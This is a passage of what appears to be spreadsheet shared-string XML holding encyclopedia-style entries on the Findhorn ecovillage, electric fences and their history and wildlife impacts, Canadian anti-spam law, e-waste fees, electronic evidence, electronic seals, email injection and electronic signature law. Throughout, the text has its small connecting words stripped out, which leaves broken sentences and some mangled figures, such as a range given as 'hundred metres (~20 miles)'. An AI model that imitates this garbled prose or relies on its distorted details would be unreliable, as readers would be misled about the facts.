1.9gha). particular significance results relating food, 'home energy' use, 'consumables personal possessions' 35%, national average respectively. findhorn residents eco-footprint lower london eco-housing development, bedzed. awards, connections critiques september 1995 findhorn ecological village project awarded peoples communities' award given friends united nations part 50th anniversary celebrations. october 1998 ecovillage project, together leadership initiatives "which inspiring innovative action earth", received best practice designation united nations centre human settlements unchs (habitat) dubai municipality. september 2000 conservation charity trees life received millennium marque award recognition work helping restore caledonian forest glen affric. following year united nations environment programme noted "most problems identified agenda roots local level, therefore unep appreciates significant contribution local level models holistic sustainable living harmony environment."various critiques exist print, although tend concentrate eclectic spirituality findhorn foundation rather environmental aspects ecovillage. there statement core values ecovillage associated community called ‘common ground’ affirming commitment "active spiritual practice" (which diversely understood interpreted) concentrates largely preferred interpersonal behaviours rather prescribing spiritual philosophy. objections raised local pressure group expansion wind park. also sustainable development scotland renewable energy scotland centre alternative technology diggers dreamers footnotes references chambers, (2004) scotland’s footprint. best foot forward. isbn 0-9546042-0-2 dawson, (2006) ecovillages: frontiers sustainability. totnes. green books. isbn 1-903998-77-8 findhorn community. thompson, william irwin (forward). (1968) findhorn garden: pioneering vision nature cooperation. harper publishers. gilman, robert diane (1991) ecovillages sustainable communities. denmark. gaia trust. jackson, svensson, (2002) ecovillage living: restoring earth people. green books. isbn 1-903998-16-6 metcalf, bill. (1996) shared visions, shared lives: communal living around globe. findhorn press. talbott, john. (1993) simply build green. findhorn foundation. isbn 1-899171-90-8 tinsley, george, (2006) ecological footprint findhorn foundation community. forres. sustainable development research centre. millennium institute. wackernagel, rees. 1996. ecological footprint: reducing human impact earth. gabriola island, society publishers. isbn 0-86571-312-x walker, alex (ed). (1994) kingdom within: guide spiritual work findhorn community. findhorn press. isbn 0-905249-99-2 external links findhorn ecovillage project</t>
  </si>
  <si>
    <t>Electric fence</t>
  </si>
  <si>
    <t>electric fence barrier uses electric shocks deter people animals crossing boundary. voltage shock effects ranging discomfort death. most electric fences used agricultural fencing forms non-human animal control, although also used protect high-security areas military installations prisons, potentially-lethal voltages used. virtual electric fences livestock using technology also developed. design function electric fences designed complete electrical circuit touched animal. component called power energizer converts power brief high voltage pulse. terminal power energizer releases electrical pulse along connected bare wire second. another terminal connected metal implanted earth, called ground earth rod. animal touching wire earth pulse complete electrical circuit conduct pulse, causing electric shock. effects shock depend upon voltage, energy pulse, degree contact recipient fence ground route current body; range barely noticeable uncomfortable, painful even lethal. fence energizers early alternating current (ac) fence chargers used transformer mechanically-driven switch generate electrical pulses. pulses wide voltage unpredictable, no-load peaks excess 10,000 volts rapid drop voltage fence leakage increased. switch mechanism prone failure. later systems replaced switch solid-state circuit, improvement longevity change pulse width voltage control. "weed burner" fence chargers popular time featured longer-duration output pulse would destroy weeds touching fence. these responsible many grass fires used weather. although still available, declined popularity. most modern fences emit pulses high voltage given interval time, take account whether animal touching conductive wires, except voltage multiplier based electric fence charger stores high voltage potential dumps charges soon conductive load (grounded animal) touches wires. depending area fenced remoteness location, fence energizers hooked permanent electrical circuit lead-acid cell batteries smaller battery kept charged solar panel. power consumption fence good condition low, lead-acid battery powering several hundred metres fence last several weeks single charge. shorter periods, cell batteries used. some energizers powered source. fencing materials smooth steel wire material often used electric fences, ranging fine thin wire used single line thicker, high-tensile (ht) wire. less often, woven wire barbed wire fences electrified, though practices create hazardous fence, particularly animal becomes caught fencing material (electrified barbed wire unlawful areas). synthetic webbing rope-like fencing materials woven fine conducting wires (usually stainless steel) become available late 1990s particularly useful areas requiring additional visibility temporary fencing. electrified fence must kept insulated earth materials conduct electricity ignite short fence. fencing must therefore avoid vegetation, cannot attached directly wood metal posts. typically, wooden metal posts driven ground plastic porcelain insulators attached them, plastic posts used. conducting material attached posts. palisade fences electrified palisade fences usually made painted mild steel, galvanized steel, stainless steel aluminium. typically fences metres typically send high voltage electric pulses palisade frequency (one pulse second). palisade electric fences used countries, particularly little vegetation short-circuit fence costs security personnel high relation automated security equipment. electric pulse strong deterrent criminals, palisade fence mechanically stronger typical steel cable electric fence, able withstand impact wildlife, small falling trees wildfires. high levels crime south africa, common residential houses perimeter defences. city johannesburg promotes palisade fencing opaque, usually brick, walls criminals cannot hide easily behind fence. city johannesburg manual safety describes best practices maintenance palisade fencing, growing vegetation front palisades allows criminals make unseen breach. virtual electric fence virtual electric fence system animal collar unit produce first audible warning shock animal approaches programmable boundary. fences control domestic dogs used since 1973, first system livestock control developed peck's invisible fence invisible fence inc., 1987. early application involved goats euphorbia esula. virtual fencing used royal society protection birds england control grazing wild sensitive landscapes without need expensive visually intrusive fencing. companies developed technology include norwegian nofence, australian agersens (brand name eshepherd) american vence. history first published 1832, chapter domestic manners americans fanny trollope describes arrangement wires connected electrical machine used protect display called "dorfeuille's hell" western museum natural history cincinnati, invented. published 1870, chapter jules verne's 20,000 leagues under sea, describes "the lightning bolts captain nemo" electrification structure defensive weapon. published 1889, mark twain's novel connecticut yankee king arthur's court, uses electric fence defensive purposes. david wilson obtained united states patent 343,939 1886, combining protection, alarm bell, telephone communications. constructed experimental 30-mile electric fence energized water wheel texas 1888, proved successful keeping cattle separated, deemed impractical business venture.in 1905, russian army improvised electric fences russo-japanese port arthur. 1915, world german army installed "wire death", electrified fences along border belgium netherlands prevent unauthorized movement people across border. fences covered kilometres consisted several strands copper wire, backed barbed wire, energized several thousand volts. estimated 3,000 human fatalities caused fence, well destruction livestock. electric fences used control livestock united states early 1930s, electric fencing technology developed united states zealand.an early application electric fence livestock control developed 1936–1937 zealand inventor bill gallagher. built ignition trembler coil set, gallagher used device keep horse scratching car. gallagher later started gallagher group improve market design. 1962, another zealand inventor, doug phillips, invented non-shortable electric fence based capacitor discharge. this significantly increased range electric fence could used hundred metres (~20 miles), reduced cost fencing 80%. non-shortable electric fence patented phillips 1964 manufactured plastic products, zealand firm, name "waikato electric fence". since then, variety plastic insulators used farms throughout world. 1939, public safety concerns united states prompted underwriters' laboratories publish bulletin electric shock electric fences, leading ansi/ul standard electric fence controllers.in 1969 robert cox, farmer adams county, iowa, invented improved electric fence bracket issued united states patent 3,516,643 june 1970. this bracket improved electric fences keeping wire high enough ground enough away fence permit grass weeds growing beneath wire mowed. brackets attached posts called "pivot bind" "torsion-lock". weight bracket, attached insulator electric wire attached insulator bind bracket post. electric fences improved significantly years. improvements include: polyethylene insulators replacing porcelain insulators, beginning 1960s. polyethylene much cheaper porcelain less breakable. improvements electrical design fence energizer, often called "charger" (usa) "fencer" (uk). changes laws. jurisdictions, certain types electrical outputs fences unlawful 1950s 1960s. areas, signage requirements restrictions limited usability. many cities continue outdated laws prohibiting electric fences prevent agricultural fences entering city. houston texas example, changed ordinance prohibited electric fencing 2008. introduction high tensile (ht) steel fence wire 1970s zealand 1980s united states. introduction synthetic webbing rope-like fencing materials woven fine conducting wires. design moveable fence components, tumblewheel, moveable fence post used making mobile one-wire fences purpose rotational grazing. insulated central enables line maintain power fence moved. uses agriculture permanent electric fencing used many agricultural areas, construction electric fences much cheaper faster conventional fences uses plain wire much lighter construction, fence need physically restrain animals). risk injury livestock (particularly horses) lower compared fences made barbed wire certain types woven wire large openings entangle feet. disadvantages include potential entire fence disabled break conducting wire, shorting conducting wire contacts non-electrified component make rest fence, power failure, forced disconnection risk fires starting vegetation touching electrified wire. other disadvantages lack visibility potential shock animal passing might accidentally touch brush fence. many fences made entirely standard smooth high-tensile wire, although high quality synthetic fencing materials also beginning used part permanent fences, particularly visibility fence concern. conventional agricultural fencing type strengthened addition single electric line mounted insulators attached front fence. similar wire mounted close ground used prevent pigs excavating beneath fencing. substandard conventional fencing also made temporarily usable proper repairs made addition single electric line "stand-off" insulator. electric materials also used construction temporary fencing, particularly support practice managed intensive grazing (also known rotational "strip" grazing). also popular places confining horses pack animals overnight trail riding, hunting, competitions endurance riding competitive trail riding. typically, strands wire, synthetic tape cord mounted metal plastic posts stakes bottom, designed driven ground foot. hand-tightened temporary fence electrified rope small area, usually spaced feet (about four metres) prevent fencing material sagging touching ground. larger areas tools used stretch wire able step-in posts larger distances without risk fencing material sag. with temporary electric fencing, large area fenced short period. temporary fencing intended left place several weeks months given additional support steel posts (which quickly driven hand tools unearthed relative ease, using leverage device), help keep fence upright, particularly corners. livestock owners using rotational grazing patterns similar year next permanently drive permanent wooden fence posts strategic locations. portable fence energizers made temporary fencing, powered solely batteries, battery kept charged small solar panel. rapid laying-out removal multiple-strand temporary electric fencing large area done using reels mounted tractor all-terrain vehicle. sheep, poultry, smaller animals, plastic electric netting mounted insulating stakes also effective keeping predators foxes. practice, animals learned unpleasant consequences touching fence tend avoid considerable periods even inactive. however, animals learn avoid shock, either running fence quickly pulses, pushing individuals fence. animals thick woolly coats (such sheep highland cattle) learn push fence themselves, using coats electrical insulation. some animals also learn recognize slight clicking sound made electric fences thus sense fence off. wild animals electric fences useful controlling movements wild animals. examples include deterring deer entering private property, keeping animals airport runways, keeping wild boar raiding crops, preventing geese soiling areas used people. electric fencing extensively used reduce conflict elephants animals humans africa asia. however, electric fences increasingly used small livestock farming management tool exclude animals, potential predators, tunnel fences gain entrance livestock camps. electrified fences also increasingly used domestic livestock wildlife (game) farms africa management tool exclude predators entering exiting camp. number animal species, predators, fences cross barrier.the value electrified fences offset lethal electric shock threats number species, including vulnerable endangered species african ground pangolin (smutsia temminckii), southern african python (python natalensis), number tortoise species.in south africa estimated 31,500 reptiles (predominantly tortoises) killed electrified fences annually. estimate african ground pangolins killed electric shock 377–1,028 annually. impacts electrified fences species, monitor lizards (varanus spp), quantified. pangolins bipedal, walking hind legs front legs tail held ground, leaving ventral surface unprotected. this makes particularly prone accidental lethal electric shock electrified fences. depending electrified fence's design height lower lines, pangolin's head exposed belly come contact electrified wire(s). initial shock causes pangolin adopt defense rolling ball, often resulting inadvertently wrapping around electrified wire.an animal wrapped around electric wire receives successive shocks, case pangolins results curling ever tighter ball around live wire. repeated electrical pulses ultimately kill pangolin. those killed outright usually succumb exposure, dehydration starvation. pangolins found dead electric fences often epidermal burns sometimes burning scales. internal injuries also significant. pangolins found alive wrapped around electrified wire suffer debilitating neurological damage experienced prolonged exposure electric current. these ultimately succumb even released. security non-lethal fence security electric fences electric fences constructed using specialised equipment built perimeter security opposed animal management. security electric fences consist wires carry pulses electric current provide non-lethal shock deter potential intruders. tampering fence also results alarm logged security electric fence energiser, also trigger siren, strobe, notifications control room directly owner email phone. practical terms, security electric fences type perimeter intrusion detection sensor array part physical barrier, psychological deterrent potential intruders, part security alarm system. non-lethal electric fences used private government-sector bodies prevent trespass. these include freight carriers, auto auctions, equipment rental companies, auto dealers, housing communities, commercial factories warehouses, prisons, military bases, government buildings. many electric fences monitored security alarm systems addition causing uncomfortable shock. electrified palisade fences used protect isolated property high security facilities, also around residential homes. they also used inside building, example grid behind windows skylights prevent people climbing through. they also used yachts large ships deter pirates. electric fences occasionally employed discourage suicide attempts tall structures, reduce incidence graffiti petty crime. high levels crime south africa, common residential houses perimeter defences, electric fences. electrified palisade fences commonly used. types security electric fences include: piggyback piggyback electric fence mounted back existing wire mesh fence, adding another level security existing perimeter barrier. piggyback profile fastened existing fence posts (e.g. pillars palisade fence) using rivets screws. these commonly used security electric fences. wall wall-top electric fences attach existing perimeter barrier masonry wall. these second common type security electric fences. stand alone stand-alone electric fences sole perimeter barrier. this type normally found many layers perimeter security around high security establishments, meaning order touch intruder would previously bypass least physical barrier. stun–lethal fence "stun–lethal" electric fence deliver non-fatal shock touched once, fatal touched second time. 12-foot-high "stun–lethal" fences time many state prisons, like arizona. federal department corrections added 2005 prisons coleman, florida, prisons tucson; terre haute, indiana; hazelton, west virginia; pine knot, kentucky; pollock, louisiana.a "stun–lethal" fence also consist fences; wires forming conventional pulsed non-lethal fence, second (interleaved first) forming lethal fence, energized fence detects intruder. alternatively consist single, pulsed fence capable running "safe", "unsafe" "lethal" modes varying pulse energy, ac/dc fence voltage fence on–off duty cycle. lethal fence electric fences designed carry potentially lethal currents used anti-personnel purposes. 1915, world german occupiers belgium closed border neutral netherlands, using electric fence running vaals scheldt. germany also erected similar fence isolate thirteen alsatian villages switzerland. electric fences used guard concentration camps nazi germany world potentially lethal voltages currents employed, continuously rather pulses. some prisoners used electric barbed-wire fence commit suicide.during algerian french erected electrified morice line. sections inner german border lined high electric fence deter potential defectors east germany. similarly, czechoslovak border lined high electric fence cold prevent emigration czechoslovakia. electric fences used similar fashion high-security prisons certain installations. typically nonelectric fence constructed either side installation, deadly current carried casual reach atop wall.north korea uses electric fences seal parts border south korea. other uses buried electric fences (also called "invisible fences" "electronic fences") sometimes used contain dogs livestock. buried wire radiates weak radio signal, detected collar worn animal. collar emits warning noise near wire, ignored, produces mild shock. humans animals unaware buried line. similar system, collar uses signals determine proximity predetermined "virtual fence" without physical installation. interference unwanted effects poorly-designed badly-maintained electric fences produce sufficient electromagnetic interference cause problems nearby telephone, radio, television reception particular problem dial-up internet users rural areas. also agricultural fencing temporary fencing notes references external links wildlife control canadian airports controlling geese uses montana prisons</t>
  </si>
  <si>
    <t>Electronic Commerce Protection Act</t>
  </si>
  <si>
    <t>electronic commerce protection (ecpa) (the act) anti-spam legislation introduced 2009 government canada house commons. history spam legislation canada first introduced 2004 anti‐spam action plan canada launched. government canada assembled group industry representatives, scholars, experts examine problems created spam canada potentially address them. first canadian bill directly addressing spam senator yoine goldstein’s bill s‐202. bill s-202 introduced 2008 sought prohibit unsolicited commercial messages, requiring explicit consent recipient. 2009, minister industry, tony clement, introduced bill c‐27 electronic commerce protection (ecpa). ecpa died order paper december 2009, bill cleared house commons committee. ecpa quickly re‐introduced fighting internet wireless spam act, bill c‐28 ("fisa") name closely reflected original political message conservative party canada (may 2010).finally, december 2010, government canada passed fighting internet wireless spam bill. coming force ecpa delayed three half years intense lobbying efforts industry groups. electronic commerce protection (spam bill) selectively came effect july 2014. because ongoing fierce lobbying parts relating unsolicited installation computer programs delayed january 2015. government information government website offers insight detailed information implementation enforcement spam legislation. according canadian government, canadian radio-television telecommunications commission (crtc) enforcement agency issue administrative monetary penalties violations spam legislation. additionally, competition bureau supposed seek "administrative monetary penalties criminal sanctions competition act." office privacy commissioner given "new powers amended personal information protection electronic documents act" (pipeda). purpose purpose promote efficiency adaptability canadian economy regulating commercial conduct discourages electronic means carry commercial activities conduct: impairs availability, reliability, efficiency optimal electronic means carry commercial activities; imposes additional costs businesses consumers; compromises privacy security confidential information; undermines confidence canadians electronic means communication carry commercial activities canada abroad." penalties maximum penalty violation "$1,000,000 case individual $10,000,000 case person." regulations following provisions come force implementation anti-spam laws: liable persons include limited employees acting scope employment. officer, director, agent mandatory corporation commits violation liable violation directed, authorized, assented acquiesced participated commission violation, whether corporation proceeded against." lobbying intense industrial lobbying efforts bill number paid lobbyists marketing survey companies, real estate agencies, copyright stakeholders include changes bill counter fears bill c-28 might interfere ability seek attract potential customers affect growth businesses. bill challenged businesses built strong relationships clients, example, real estate agents. while liberal party agrees ecpa restricts businesses number ways, support ecpa restricts spam. references external links electronic commerce protection department justice fast facts canada's anti-spam legislation industry canada service centre</t>
  </si>
  <si>
    <t>Electronic Waste Recycling Fee</t>
  </si>
  <si>
    <t>electronic waste recycling imposed government purchases electronic products. fees used future recycling products, many contain hazardous materials. locations fees include european union, state california province ontario, canada. united states united states, states laws regarding electronics recycling. non-profit national center electronics recycling calls "patchwork state regulations". california electronic waste recycling imposed government state california united states purchases electronic products viewable screens. elements california electronic waste recycling act. retailers submit collected fees board equalization. retailers behalf consumer, however retailer must remit amount state indicate amount consumer receipt. retailers retain collected fees order recoup costs collection. fees collected reimburse number recycling centers, turn offer free recycling e-waste consumers businesses. statutory recycling fees adjusted every years state august year. sellers manufacturers subject civil fines failing collect remit fee. fees collected following ceds (covered electronic devices): televisions contain cathode tubes, liquid crystal displays, plasma screens. computer monitors contain cathode tubes liquid crystal displays. laptop computers portable players liquid crystal displays. "bare" cathode tubes product contains cathode tube. washington washington, passed 2006 requires manufacturers responsible recycling products ends lifetimes. manufacturers created industry association purpose charges manufacturers based market share amount items recycled. europe europe, waste electrical electronic equipment directive requires member countries european union allow consumers recycle electronics free charge. this funded national "producer compliance schemes", manufacturers distributors annual collection recycling associated waste electronics household waste recycling centres. also waste legislation references external links california state board equalization ewaste items list</t>
  </si>
  <si>
    <t>Electronic evidence</t>
  </si>
  <si>
    <t>electronic evidence consists sub-forms: analog longer prevalent, still existent sound recordings e.g), digital evidence (see longer article)this rather complex relationship depicted graphically shown part eu-funded project topic embedded right. chapter associated 2018 book goes detail, website, http://www.evidenceproject.eu/categorization electronic evidence abbreviated e-evidence, shorter term gaining acceptance continental europe. this page covers mainly activity international level. access electronic evidence access area much current activity international level taking place. network called internet jurisdiction policy network holds global conferences topic various locations. here supranational developments geneva, york, strasbourg, paris brussels. february 2022 authoritative report published covering worldwide developments. global privacy assembly data protection privacy commissioners "unsurprisingly places greater emphasis individuals’ privacy rights oecd draft" 2021. 2021 developed document summing concerns. international organization standardization (iso) there international forensic standard issued international electrical commission iso/iec 27037. united nations late 2019 russia china initiated move consider drafting global cybercrime convention. western democracies conspicuously absent sponsoring parties. many non-governmental organizations (ngos) issued protest letter claiming russian initiative would potentially infringe upon human rights. council europe convention cybercrime (“budapest convention”) "the first international treaty crimes committed internet".the currently drafting update form second additional protocol convention. international group national data protection authorities secretariat germany called international working group data protection telecommunications monitoring council europe cybercrime convention holding 60-some meetings access problem, recently address events brazil, belgium china addition microsoft ireland case.the draft protocol proven quite controversial. joint civil society statements submitted. "the cybercrime convention committee extended negotiations protocol december 2020." meanwhile guidelines 2019. oecd 2021 deliberations began oecd develop common principles among member countries. there major methods access: compelled obliged) access direct (including covert) access. wants address both, whereas united states hesitant include covert access. european union european commission body holding right initiative) made legislative proposals directive establishing legal representative, regulation access evidence criminal investigations). taken together, proposals comprise "package". legislators, i.e. parliament council, meanwhile found positions regard commission proposal. council calls position "general approach". committees parliament different competences, sometimes easily distinguished, sometimes competence disputes. libe received "the lead", lead competence working proposals, subsequently produced report. rapporteur birgit sippel proposed changes versions commission council. report given rise summary detailed commentary analysing provisions efficiency protection human rights. agreement reached parliament enter trilogue negotiations (ep+cou+com). differences versions prepared council parliament respectively shown couple documents seen accelerated procedure opposed ordinary first reading/second reading procedure, report voted libe. plenary mandated committee take negotiations council, commission formally played neutral advisory role. formally, first reading closed trilogue reached agreement. then plenary vote trilogue negotiation outcome first reading position, effectively also allow become law. there could also situation agreement reached, case parliament would vote unchanged libe report finalise first reading make parliament position, entering second reading. july 2022 movement negotiations. authoritative texts found eur-lex website. february 2019, european commission recommended "engaging international negotiations cross-border rules obtain electronic evidence," involving coe. indeed, usa/eu axis scenes work issues, described compared 2019 paper advocating revamping mutual legal assistance treaty, page 17.the reason development given fact "[i]n offline world, authorities request obtain documents necessary investigate crime within country, electronic evidence stored online service providers often based different country [sic] investigator, even crime country." commission gave data supporting decision. indeed, reason treating electronic evidence differently ways evidence treated. moreover, expedite convergence form reconciliation world's main legal systems, i.e. common civil law, least regards case. negotiations begin. however, questions different systems might converge common agreement. deadlock exist europe. core instruments handle cross-border requests are: european production order (epoc) european preservation order (epoc-pr). framework instruments european evidence warrant.separately above, dedicated convention drafted british barrister. united kingdom government announced "uk-us bilateral data access agreement dramatically speed investigations prosecutions enabling enforcement, appropriate authorisation, directly tech companies access data, rather governments, take years." gives effect crime (overseas production orders) 2019, received royal assent february year facilitated cloud america, passed last year." "the agreement change anything companies encryption stop companies encrypting data." encryption, australia contacting facebook directly agreement means officials apply crime (overseas production orders) 2019. united states basis obtaining cross-border access stored communications amended cloud act. agreement negotiated "will enter force following six-month congressional review period mandated cloud act, related review uk’s parliament." controversy controversial cases brought court 2013 microsoft corp. united states case. potential conflicts regime cloud legal scholars jennifer daskal peter swire propose us/eu agreement. those authors also assembled seeking address questions specifically arisen european union connection cloud act.highlighting differences status quo, european parliament's committee civil liberties, justice home affairs commissioned study held hearing; study available.europeans discussing ‘co-operating digital age’ internet governance forum critical eu's proposals, fearing "companies businesses [might] implement stronger filtering blocking mechanisms order avoid sanctions reputational damages." later november internet governance forum 2019 berlin panelists described initiatives brazil russia respectively. some problems quite different microsoft case alluded found described article german weekly zeit dated december 2018 comments proposed direct access tracks described "european union"; journalist martin klingst entitled "nackt gesetz" (naked law, meaning exposed foreign observation domestic law).klingst appalled thought member state like hungary might demand data. apparently katharina barley, german federal minister justice, agrees. germany protections infringements one's "informational self-determination" strongest member state. european arrest warrant another example national limits placed rights conditions. besides, klingst sees contradiction internet companies guardians right wrong, whereas draft german might punished themselves. would respect germany's interpretation maintains confidentiality? asks rhetorically. e-evidence could become first case, klingst predicts, testing whether germany's judges reserved enough room basic protections. much evidence plain text; evidence encrypted. 2015 2016, another chapter added long-standing encryption controversy fbi-apple encryption dispute. that controversy continues 2019 multiple nation-states pressuring facebook backdoor messenger service. references further reading journals digital evidence electronic signature review (open source), http://journals.sas.ac.uk/deeslr/ journal digital forensics, security (open source), https://commons.erau.edu/jdfsl/books gita radhakrishna, electronic evidence malaysia: admissibility discovery (thomson reuters sweet maxwell, malaysia, 2022). stephen mason daniel seng, editors: electronic evidence electronic signatures (5th edition, institute advanced legal studies humanities digital library, school advanced study, university london, 2021) (open source), https://humanities-digital-library.org/index.php/hdl/catalog/book/electronic-evidence-and-electronic-signatures george paul: foundations digital evidence (american association, 2008) daniel scanlan: digital evidence criminal (thomson reuters canada limited, 2011) shira scheindlin sedona conference (2016): electronic discovery digital evidence nutshell, second edition, west academic publishing, isbn 63459</t>
  </si>
  <si>
    <t>Electronic seal</t>
  </si>
  <si>
    <t>electronic seal piece data attached electronic document data, ensures data origin integrity. term used regulation 910/2014 (eidas regulation) electronic transactions within internal european market. description conceptually similar electronic signatures usually technically realized digital signatures, electronic seals serve evidence electronic document issued specific legal entity. purpose, electronic seal must linked data sealed subsequent change data detectable also fake seal cannot created without access data (usually private key) used creation digital seal. this usually achieved qualified digital certificate involved creation digital seal. unique private used creation digital seal ensures non-repudiation: entity created digital seal cannot later deny created seal document. document modified digital seal created, digital seal valid modified document. this checked anyone access public corresponding private used creation digital seal, ensuring integrity sealed document. besides authenticating document issued legal entity, e-seals also used authenticate digital asset legal person, software code servers. important difference digital signature electronic seal latter usually created legal person digital signatures created natural person. creation digital signature, action person signing document data required. contrast, creation digital seals incorporated automated processes executed digital environment. qualified electronic seal qualified electronic seal electronic seal compliant regulation 910/2014 (eidas regulation) electronic transactions within internal european market. enables verify issuer document long periods time. qualified electronic seals considered digital equivalent seals legal entities paper. according eidas regulation, qualified electronic seal must created qualified electronic device based qualified certificate electronic seal. references</t>
  </si>
  <si>
    <t>Email injection</t>
  </si>
  <si>
    <t>email injection security vulnerability occur internet applications used send email messages. email equivalent http header injection. like injection attacks, vulnerability general class vulnerabilities occur programming language embedded within another. when form added page submits data application, malicious user exploit mime format append additional information message sent, list recipients completely different message body. because mime format uses carriage return delimit information message, message determines eventual destination, adding carriage returns submitted form data allow simple guestbook used send thousands messages once. malicious spammer could tactic send large numbers messages anonymously.more information topic, including examples ways avoid vulnerability, found securephp wiki. however, vulnerability limited php; potentially affect application sends email messages based input arbitrary users. references external links email headers injection using mail() function (english) email headers injection using mail() function (french)</t>
  </si>
  <si>
    <t>Electronic signature</t>
  </si>
  <si>
    <t>electronic signature, e-signature, data logically associated data used signatory sign associated data. this type signature legal standing handwritten signature long adheres requirements specific regulation created (e.g., eidas european union, nist-dss zertes switzerland).electronic signatures legal concept distinct digital signatures, cryptographic mechanism often used implement electronic signatures. while electronic signature simple name entered electronic document, digital signatures increasingly used e-commerce regulatory filings implement electronic signatures cryptographically protected way. standardization agencies like nist etsi provide standards implementation (e.g., nist-dss, xades pades). concept new, common jurisdictions recognized telegraph signatures back mid-19th century faxed signatures since 1980s. description electronic signature intended provide secure accurate identification method signatory provide seamless transaction. definitions electronic signatures vary depending applicable jurisdiction. common denominator countries level advanced electronic signature requiring that: signatory uniquely identified linked signature signatory must sole control private used create electronic signature signature must capable identifying accompanying data tampered message signed event accompanying data changed, signature must invalidatedelectronic signatures created increasing levels security, requirements means creation various levels prove validity signature. provide even stronger probative value described advanced electronic signature, countries like member states european union switzerland introduced qualified electronic signature. difficult challenge authorship statement signed qualified electronic signature statement non-repudiable. technically, qualified electronic signature implemented advanced electronic signature utilizes digital certificate, encrypted security signature-creating device authenticated qualified trust service provider. contract since well american civil began 1861, morse code used send messages electrically telegraph. some messages agreements terms intended enforceable contracts. early acceptance enforceability telegraphic messages electronic signatures came hampshire supreme court case, howley whipple, 1869.in 1980s, many companies even individuals began using machines high-priority time-sensitive delivery documents. although original signature original document paper, image signature transmission electronic.courts various jurisdictions decided enforceable legality electronic signatures include agreements made email, entering personal identification number (pin) bank atm, signing credit debit slip digital device application graphics tablet technology) point sale, installing software clickwrap software license agreement package, signing electronic documents online. first agreement signed electronically sovereign nations joint communiqué recognizing growing importance promotion electronic commerce, signed united states ireland 1998. enforceability 1996 united nations published uncitral model electronic commerce. article uncitral model electronic commerce highly influential development electronic signature laws around world, including 2001, uncitral concluded work dedicated text, uncitral model electronic signatures, adopted jurisdictions. latest uncitral text dealing electronic signatures article paragraph united nations convention electronic communications international contracts, 2005, establishes mechanism functional equivalence electronic handwritten signatures international level well cross-border recognition. canadian (pipeda) attempts clarify situation first defining generic electronic signature signature consists letters, characters, numbers symbols digital form incorporated attached associated electronic document," defining secure electronic signature electronic signature specific properties. pipeda's secure electronic signature regulations refine definition digital signature applied verified specific manner.in european union, regulation 910/2014 electronic identification trust services electronic transactions european internal market (eidas) sets legal frame electronic signatures. repeals directive 1999/93/ec. current applicable version eidas published european parliament european council july 2014. following article eidas regulation, advanced electronic signature shall “not denied legal effect admissibility evidence legal proceedings". however reach higher probative value enhanced level qualified electronic signature. requiring qualified electronic signature creation device based certificate issued qualified trust service provider, upgraded advanced signature carries according article eidas regulation legal value handwritten signature. however, regulated european union similarly zertes switzerland. qualified electronic signature defined united states.the u.s. code defines electronic signature purpose electronic sound, symbol, process, attached logically associated contract record executed adopted person intent sign record." electronic transmission document contains signature, case facsimile transmissions, encoded message, telegraphy using morse code. united states, definition qualifies electronic signature wide uniform electronic transactions ("ueta") released national conference commissioners uniform state laws (nccusl) 1999. influenced committee white papers uniform promulgated nccusl. under ueta, term means electronic sound, symbol, process, attached logically associated record executed adopted person intent sign record." this definition many core concepts ueta echoed u.s. esign 2000. states, district columbia, virgin islands enacted ueta. only york illinois enacted ueta, states adopted electronic signatures statute.as june 2020, washington state office adopted ueta australia, electronic signature recognised "not necessarily writing name, maybe mark identifies party.” under electronic transactions acts federal, state territory jurisdiction, electronic signature considered enforceable method used identify person indicate person’s intention respect information communicated method either: reliable appropriate purpose electronic communication generated communicated, light circumstances, including relevant agreement; (ii) proven fact fulfilled functions together evidence person signature required given consents method. legal definitions various laws passed internationally facilitate commerce using electronic records signatures interstate foreign commerce. intent ensure validity legal effect contracts entered electronically. instance, pipeda (canadian federal law) electronic signature signature consists letters, characters, numbers symbols digital form incorporated attached associated electronic document"; secure electronic signature electronic signature unique person making signature; technology process used make signature sole control person making signature; technology process used identify person using technology process; electronic signature linked electronic document used determine whether electronic document changed since electronic signature incorporated attached associated electronic document.esign federal law) electronic- term 'electronic' means relating technology electrical, digital, magnetic, wireless, optical, electromagnetic, similar capabilities. electronic record- term 'electronic record' means contract record created, generated, sent, communicated, received, stored electronic means. electronic signature- term 'electronic signature' means electronic sound, symbol, process, attached logically associated contract record executed adopted person intent sign record.regulation 910/2014 electronic identification trust services electronic transactions internal market (european union regulation) (10) ‘electronic signature’ means data electronic form attached logically associated data electronic form used signatory sign; (11) ‘advanced electronic signature’ means electronic signature meets requirements article (12) ‘qualified electronic signature’ means advanced electronic signature created qualified electronic signature creation device, based qualified certificate electronic signatures;gpea 1710 federal law) electronic signature.—the term "electronic signature" means method signing electronic message that— identifies authenticates particular person source electronic message; indicates person's approval information contained electronic message.ueta state law) "electronic" means relating technology electrical, digital, magnetic, wireless, optical, electromagnetic, similar capabilities. "electronic agent" means computer program electronic automated means used independently initiate action respond electronic records performances whole part, without review action individual. "electronic record" means record created, generated, sent, communicated, received, stored electronic means. "electronic signature" means electronic sound, symbol, process attached logically associated record executed adopted person intent sign record.federal reserve federal regulation) refers esign actcommodity futures trading commission part sec. federal regulations) (tt) electronic signature means electronic sound, symbol, process attached logically associated record executed adopted person intent sign record.food drug administration sec. 11.3 federal regulations) digital signature means electronic signature based upon cryptographic methods originator authentication, computed using rules parameters signer's identity integrity data verified. electronic signature means computer data compilation symbol series symbols executed, adopted, authorized individual legally binding equivalent individual's handwritten signature.united states patent trademark office sec. (federal regulation) (d)(2) s-signature. s-signature signature inserted forwarding slash marks, handwritten signature (i)the s-signature must consist letters, arabic numerals, both, appropriate spaces commas, periods, apostrophes, hyphens punctuation... (e.g., /dr. james jones, jr./)... (iii) signer's name must presented printed typed form preferably immediately adjacent s-signature, reasonably specific enough identity signer readily recognized. laws regarding australia electronic transactions 1999 (which incorporates amendments electronic transactions amendment 2011), section signatures specifically relates electronic signatures. brazil 2020 electronic signature (lei assinaturas eletrônicas); brazil's national public certificate infrastructure (infraestrutura chaves públicas brasileira icp-brasil) bulgaria electronic document electronic certification services canada pipeda, regulations, canada evidence act. china people's republic china electronic signature (effective april 2005) costa rica digital signature 8454 (2005) croatia 2002, updated 2008 czech republic currently directly applicable eidas zákona službách vytvářejících důvěru elektronické transakce 297/2016 (effective september 2016), formerly zákon elektronickém podpisu 227/2000 (effective october 2000 september 2016 derogated) ecuador comercio electronico firmas mensajes datos european union eidas regulation implementation within digital signatures law. india information technology iraq electronic transactions electronic signature 2012 ireland electronic commerce 2000 japan concerning electronic signatures certification services, 2000 lithuania electronic identification trust services electronic transactions mexico e-commerce [2000] malaysia digital signature 1997 digital signature regulation 1998 (https://www.mcmc.gov.my/sectors/digital-signature) moldova 